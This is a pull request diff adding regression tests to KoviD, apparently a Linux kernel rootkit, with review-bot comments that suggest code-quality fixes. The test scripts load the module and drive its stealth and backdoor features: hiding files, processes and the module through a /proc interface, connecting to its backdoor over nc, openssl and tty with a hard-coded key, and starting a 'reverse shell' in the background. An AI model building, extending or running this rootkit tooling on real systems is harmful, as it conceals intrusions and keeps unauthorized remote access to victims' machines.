Merge pull request #147 from carloslack/regression-tests-v2.1.1
Regression tests v2.1.1
carloslack authored Dec 1, 2024
2 parents 1f76e72 + e1d319d commit 6b8493b
Showing 14 changed files with 179 additions and 15 deletions.
7 changes: 7 additions & 0 deletions Makefile
Expand Up @@ -11,8 +11,15 @@ AS=$(shell which as)
CTAGS=$(shell which ctags)
JOURNALCTL := $(shell which journalctl)
UUIDGEN := $(shell uuidgen)

# For tests, use hardcoded keys.
ifndef TEST_ENV
BDKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')
UNHIDEKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')
else
BDKEY=0x7d3b1cb572f16425
UNHIDEKEY=0x2
endif

# PROCNAME, /proc/<name> interface.
COMPILER_OPTIONS := -Wall -DPROCNAME='"$(PROCNAME)"' \
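Review bot: `ifndef TEST_ENV` picks the fixed keys on definedness alone, so `make TEST_ENV=0`, or an empty `TEST_ENV` inherited from the caller's environment, still produces a module built with the published test key instead of fresh random ones. Testing the value is safer: `ifeq ($(TEST_ENV),1)` for the fixed-key branch with the random keys as the `else` default, plus a `$(warning building with fixed TEST_ENV keys)` inside that branch so an accidental test-key build is visible in the build log. The same key literal is now repeated in several updated .test files; reading it from one shared place would keep the build and the scripts from drifting apart.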
13 changes: 9 additions & 4 deletions docs/TestFeatures.md
Expand Up @@ -39,7 +39,7 @@ $ cmake -DPROCNAME=myproc -DMODNAME=mymodule ../
If you want to build and run native tests only, just use:

```
$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname"
$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1
```

## Building for Linux version other than native
Expand Down Expand Up @@ -109,9 +109,10 @@ $ make
To simply run those (but make sure you followed the instructions for setting the enviroment described below):

```
$ cd KoviD && make PROCNAME="myprocname" TEST_ENV=1
# From root directory of the project
$ mkdir build && cd build
$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname"
$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1
# Please run the command with only one Thread!
$ make check-kovid -j1
```
Expand Down Expand Up @@ -187,7 +188,7 @@ Usual set of commands to be used:
$ git clone https://github.com/carloslack/KoviD.git main-KoviD && cd main-KoviD
$ git submodule update --init test/test-artefacts
$ mkdir build && cd build
$ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" && make check-kovid
$ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1 && make check-kovid
```

## Insall dependecies and set up enviroment
Expand Down Expand Up @@ -269,7 +270,7 @@ Run tests in `DEPLOY` mode (some tests are run in this mode only; this is exampl

```
$ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=projects/private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCROSS_TESTS=ON -DCMAKE_C_COMPILER=gcc -DDEPLOY=1
$ make PROCNAME="myprocname" DEPLOY=1
$ make PROCNAME="myprocname" DEPLOY=1 TEST_ENV=1
$ make check-kovid
```

Expand Down Expand Up @@ -306,3 +307,7 @@ NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should co
| tty backdoor | Yes | native/tty-backdoor.test |
| backdoor echo -s | Yes | native/nc-backdoor-echo-s.test |
| Hide/Unhide Module | Yes | native/hide-unhide-module.test |
| backdoor + PID | Yes | native/nc-backdoor-plus-pid.test |
| hide file | Yes | native/hiden-file.test |
| hide file (2) | Yes | native/hiden-file-in-all-dirs.test |
| unhide module | Yes | native/hide-unhide-module.test |
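--- a/test/native/Inputs/Makefile
+++ b/test/native/Inputs/Makefile
@@ -0,0 +1,7 @@
+obj-m = hello.o
+
+all:
+make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+make --C /lib/modules/$(shell uname -r)/build M=$(PWD) clean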
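Review bot: The `clean` recipe passes `--C` where `-C` is intended, so `make clean` in this directory fails with an unknown-option error instead of cleaning; it should read `make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean`. The rendered view drops leading whitespace, so it is worth confirming that both recipe lines start with a tab, which Make requires. Using `$(MAKE)` instead of a bare `make` in the recipes would also propagate flags such as the `-j1` the docs ask for to the kernel build.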
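--- a/test/native/Inputs/hello.c
+++ b/test/native/Inputs/hello.c
@@ -0,0 +1,24 @@
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/init.h>
+
+MODULE_LICENSE("GPL");
+
+MODULE_DESCRIPTION("A simple Hello world LKM!");
+
+MODULE_VERSION("0.1");
+
+static int __init hello_start(void)
+{
+printk(KERN_INFO "Loading hello module...\n");
+printk(KERN_INFO "Hello world\n");
+return 0;
+}
+
+static void __exit hello_end(void)
+{
+printk(KERN_INFO "Goodbye!!!\n");
+}
+
+module_init(hello_start);
+module_exit(hello_end);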
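Review bot: Nothing in the file records that the message strings are matched by FileCheck, so a future wording tweak here would silently break simple-insmod-hello-ko.test; a header comment such as `/* Test fixture: the "Loading hello module..." and "Hello world" lines are CHECKed by test/native/simple-insmod-hello-ko.test. */` would tie the two together. Current kernel style also prefers `pr_info("Hello world\n");` over `printk(KERN_INFO ...)`, a small readability change with identical output.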
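--- a/test/native/Inputs/simple-test.c
+++ b/test/native/Inputs/simple-test.c
@@ -0,0 +1,6 @@
+int main()
+{
+while(1);
+
+return 0;
+}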
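Review bot: `while(1);` spins a core at 100% for as long as the fixture lives, which in nc-backdoor-plus-pid.test is until the process is finally killed, while the test only needs a long-lived process; `for (;;) pause();` (from `<unistd.h>`) blocks instead and still exits on SIGKILL. `int main()` should be `int main(void)` so the definition has a proper prototype. Nothing in the commit compiles this file into the `./Inputs/a.out` that nc-backdoor-plus-pid.test runs, so that build step appears to be manual and is not documented anywhere in the diff.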
5 changes: 3 additions & 2 deletions test/native/hide-unhide-module.test
@@ -1,4 +1,3 @@
# REQUIRES: 0
# REQUIRES: DEBUG_ONLY
# REQUIRES: NATIVE_TESTS

Expand All @@ -8,8 +7,10 @@
sleep 10
sudo insmod ../../../build/kovid.ko
lsmod | grep kovid
echo -h > /proc/myprocname
kill -CONT 31337
echo hide-lkm > /proc/myprocname
lsmod | grep kovid
echo unhide-lkm=2 > /proc/myprocname
sudo rmmod kovid

# CHECK: kovid
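Review bot: The added `echo unhide-lkm=2 > /proc/myprocname` only matches a module built with the fixed test key (`UNHIDEKEY=0x2` in the Makefile's `TEST_ENV` branch), but the script does not say so, and against a normally built module the outcome of the following `lsmod | grep kovid` silently depends on how the binary was built. A comment next to the line, `# 2 is the fixed UNHIDEKEY of a TEST_ENV=1 build; see Makefile`, would make the prerequisite explicit. The CHECK lines for this script continue outside the hunk.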
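--- a/test/native/hiden-file-in-all-dirs.test
+++ b/test/native/hiden-file-in-all-dirs.test
@@ -0,0 +1,30 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo insmod ../../../build/kovid.ko
+kill -CONT 31337
+
+TEST_FILE="hidden_file.txt"
+
+# Create a file with the same name in another directory
+OTHER_DIR="/tmp/other_dir"
+mkdir -p "$OTHER_DIR"
+touch "$OTHER_DIR/$TEST_FILE"
+
+# Hide the file using the backdoor
+echo hide-file-anywhere="$TEST_FILE" > /proc/myprocname
+
+# Check that files with the same name in other directories are also hidden
+ls "$OTHER_DIR" | grep "$TEST_FILE" || echo "File is hidden in other directory"
+
+# Cleanup
+rm -rf "$OTHER_DIR"
+
+# Remove the kernel module
+sudo rmmod kovid
+
+# CHECK: File is hidden in other directory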
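Review bot: `ls "$OTHER_DIR" | grep "$TEST_FILE" || echo ...` prints the success marker whenever grep finds nothing, including when insmod failed, the write to /proc/myprocname was rejected, or the directory does not exist, so the CHECK can pass without the feature doing anything; hiden-file.test has the same pattern. A positive precondition before the hide step, `ls "$OTHER_DIR" | grep -q "$TEST_FILE" && echo "File visible before hide"`, with a matching `# CHECK: File visible before hide` placed ahead of the existing CHECK, makes a pass depend on the listing actually changing. Checking the exit status of the `echo` to /proc would catch a rejected command, and creating the directory with `mktemp -d` instead of the fixed `/tmp/other_dir` avoids `rm -rf` on a path another user may already own.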
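--- a/test/native/hiden-file.test
+++ b/test/native/hiden-file.test
@@ -0,0 +1,29 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo insmod ../../../build/kovid.ko
+kill -CONT 31337
+
+# Create a test directory and file
+TEST_DIR="/tmp/test_hide_file"
+TEST_FILE="hidden_file.txt"
+mkdir -p "$TEST_DIR"
+touch "$TEST_DIR/$TEST_FILE"
+
+# Hide the file using the backdoor
+echo hide-file="$TEST_DIR/$TEST_FILE" > /proc/myprocname
+
+# Verify that the file is hidden when listing the directory
+ls "$TEST_DIR" | grep "$TEST_FILE" || echo "File is hidden"
+
+# Cleanup
+rm -rf "$TEST_DIR"
+
+# Remove the kernel module
+sudo rmmod kovid
+
+# CHECK: File is hidden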
12 changes: 6 additions & 6 deletions test/native/nc-backdoor-echo-s.test
Expand Up @@ -8,18 +8,18 @@
sudo dmesg -c
sleep 10
sudo insmod ../../../build/kovid.ko
sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999
echo -s > /proc/myprocname
sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425
echo list-hidden-tasks > /proc/myprocname
sudo rmmod kovid
sudo dmesg

# CHECK: kv: using kprobe for kallsyms_lookup_name
# CHECK: Waiting for event
# CHECK: loaded
# CHECK: Got event
# CHECK: hide [{{.*}}] {{.*}}
# CHECK: hide [{{.*}}] {{.*}}
# CHECK: BD : dash
# CHECK: BD : bash
# CHECK: hide: {{.*}}
# CHECK: hide: {{.*}}
# CHECK: hide: {{.*}}
# CHECK: hide: {{.*}}
# CHECK: Got event
# CHECK: unloaded
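Review bot: The key `0x7d3b1cb572f16425` appended to the bdclient.sh line is now hard-coded in this file, nc-backdoor.test, openssl-backdoor.test and tty-backdoor.test as well as in the Makefile's `TEST_ENV` branch, with nothing tying the copies together; rotating the test key means editing six files, and a single stale copy only shows up as a runtime failure. Sourcing it from one shared script under `test/native/Inputs/` that exports it as a shell variable, and referencing that variable on the bdclient.sh line, keeps the scripts and the build in step. A comment stating that these tests require a `TEST_ENV=1` build would also help, since that prerequisite currently appears only in the docs.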
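--- a/test/native/nc-backdoor-plus-pid.test
+++ b/test/native/nc-backdoor-plus-pid.test
@@ -0,0 +1,36 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo insmod ../../../build/kovid.ko
+
+# Start the reverse shell in the background, suppressing its output
+sudo timeout 20 ../../../scripts/bdclient.sh nc localhost 9999 > /dev/null 2>&1 &
+
+# Allow the reverse shell to initialize
+sleep 1
+
+# Send a signal to the "kill -CONT 31337" process as an additional check
+kill -CONT 31337 || echo "sh: can't kill pid 31337: No such process"
+
+# Run the `a.out` executable in the background and capture its PID
+./Inputs/a.out &
+AOUT_PID=$!
+
+# Wait briefly to ensure the process has started
+sleep 1
+
+# Hide the process using the backdoor functionality
+echo hide-task-backdoor=$AOUT_PID > /proc/myprocname
+
+# Attempt to kill the hidden process and verify that it fails
+kill -9 "$AOUT_PID" || echo "sh: can't kill pid $AOUT_PID: No such process"
+
+# Remove the module
+sudo rmmod kovid
+
+# CHECK: sh: can't kill pid 31337: No such process
+# CHECK: sh: can't kill pid {{.*}}: No such process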
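Review bot: When `a.out` survives `kill -9` as the test expects, nothing ever stops it, so every run leaves a busy-looping process behind after `sudo rmmod kovid`; presumably it is reachable again once the module is gone, so add `kill -9 "$AOUT_PID" 2>/dev/null; wait "$AOUT_PID" 2>/dev/null` after the rmmod line. Both `|| echo "sh: can't kill pid ..."` fallbacks also fire when the target simply does not exist, so a failed insmod or a missing `a.out` still produces the two expected lines; checking that `./Inputs/a.out` started (`kill -0 "$AOUT_PID"`) before the hide step would remove that false pass. `./Inputs/a.out` is also the only `./Inputs/` reference in the suite, while simple-insmod-hello-ko.test reaches the same directory via `../../../test/native/Inputs/`, so one of the two conventions is probably wrong for the working directory lit uses.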
3 changes: 2 additions & 1 deletion test/native/nc-backdoor.test
@@ -1,3 +1,4 @@
# REQUIRES: 0
# REQUIRES: DEBUG_ONLY
# REQUIRES: NATIVE_TESTS

Expand All @@ -7,7 +8,7 @@
sudo dmesg -c
sleep 10
sudo insmod ../../../build/kovid.ko
sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999
sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425
sudo rmmod kovid
sudo dmesg

2 changes: 1 addition & 1 deletion test/native/openssl-backdoor.test
Expand Up @@ -6,7 +6,7 @@
# RUN: FileCheck-18 --input-file=%t.log %s

sudo insmod ../../../build/kovid.ko
sudo timeout 10 ../../../scripts/bdclient.sh openssl localhost 9999
sudo timeout 10 ../../../scripts/bdclient.sh openssl localhost 9999 0x7d3b1cb572f16425
sudo rmmod kovid

# CHECK: ACCEPT
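--- a/test/native/simple-insmod-hello-ko.test
+++ b/test/native/simple-insmod-hello-ko.test
@@ -0,0 +1,18 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+## Make sure you enter `test/native/Inputs` and run `make`
+## in order to build `hello.ko`.
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 2
+sudo insmod ../../../test/native/Inputs/hello.ko
+sudo rmmod hello
+sudo dmesg
+
+# CHECK: Loading hello module...
+# CHECK: Hello world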
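Review bot: The script relies on `hello.ko` having been built by hand (the `##` comment says so) and otherwise fails at `insmod` with nothing but a missing CHECK to explain it; a guard before the insmod, `[ -f ../../../test/native/Inputs/hello.ko ] || { echo "hello.ko not built; run make in test/native/Inputs"; exit 1; }`, gives a direct message, or the RUN line could build it first. `sudo dmesg -c` clears the host's kernel ring buffer as a side effect, which the other dmesg-based tests share; reading with plain `dmesg` and matching on the fixture's distinctive strings would be less destructive. The `sleep 2` has no stated purpose, so a one-line comment on what it waits for would help the next reader.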
2 changes: 1 addition & 1 deletion test/native/tty-backdoor.test
Expand Up @@ -8,7 +8,7 @@
sudo dmesg -c
sleep 20
sudo insmod ../../../build/kovid.ko
sudo timeout 10 ../../../scripts/bdclient.sh tty localhost 9999
sudo timeout 10 ../../../scripts/bdclient.sh tty localhost 9999 0x7d3b1cb572f16425
sudo rmmod kovid
sudo dmesg

